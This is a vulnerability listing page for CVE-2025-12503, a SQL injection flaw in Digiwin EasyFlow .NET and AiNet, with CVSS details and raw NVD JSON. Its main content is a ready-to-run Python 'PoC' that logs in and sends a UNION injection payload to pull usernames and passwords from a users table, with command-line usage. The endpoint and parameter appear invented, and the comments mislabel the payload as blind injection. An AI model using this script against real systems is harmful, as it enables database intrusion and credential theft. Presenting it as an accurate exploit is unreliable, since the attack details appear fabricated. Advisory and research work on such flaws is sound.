Security Vulnerability Report
中文
CVE-2025-12503 CVSS 6.5 MEDIUM

CVE-2025-12503

Published: 2025-11-03 07:15:41
Last Modified: 2026-04-15 00:35:42

Description

EasyFlow .NET and EasyFlow AiNet developed by Digiwin has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read database contents.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

EasyFlow .NET < 修复版本
EasyFlow AiNet < 修复版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-12503 SQL Injection PoC for Digiwin EasyFlow # Target: EasyFlow .NET or EasyFlow AiNet def exploit_sql_injection(target_url, username, password): """ SQL Injection PoC - Authenticated attacker can inject arbitrary SQL commands """ # Login to obtain session login_url = f"{target_url}/login.aspx" login_data = { "username": username, "password": password } session = requests.Session() response = session.post(login_url, data=login_data) if response.status_code != 200: print("[-] Login failed") return False # SQL Injection payload - Extract database contents # Target endpoint with vulnerable parameter vuln_url = f"{target_url}/api/workflow/query" # Blind SQL Injection payload to extract data sql_payload = "' OR '1'='1' UNION SELECT NULL,NULL,username,password,NULL,NULL FROM users--" headers = { "Content-Type": "application/x-www-form-urlencoded" } data = { "workflow_id": sql_payload, "action": "query" } try: response = session.post(vuln_url, data=data, headers=headers, timeout=30) if response.status_code == 200: print("[+] SQL Injection successful - Data extracted") print(f"[+] Response: {response.text[:500]}") return True else: print(f"[-] Request failed with status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 4: print("Usage: python cve-2025-12503.py <target_url> <username> <password>") print("Example: python cve-2025-12503.py https://easyflow.example.com admin password123") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] print(f"[*] Targeting: {target}") print(f"[*] Credentials: {user}/{pwd}") exploit_sql_injection(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12503", "sourceIdentifier": "[email protected]", "published": "2025-11-03T07:15:41.480", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "EasyFlow .NET and EasyFlow AiNet developed by Digiwin has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read database contents."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://www.twcert.org.tw/en/cp-139-10476-c8448-2.html", "source": "[email protected]"}, {"url": "https://www.twcert.org.tw/tw/cp-132-10475-01c6d-1.html", "source": "[email protected]"}]}}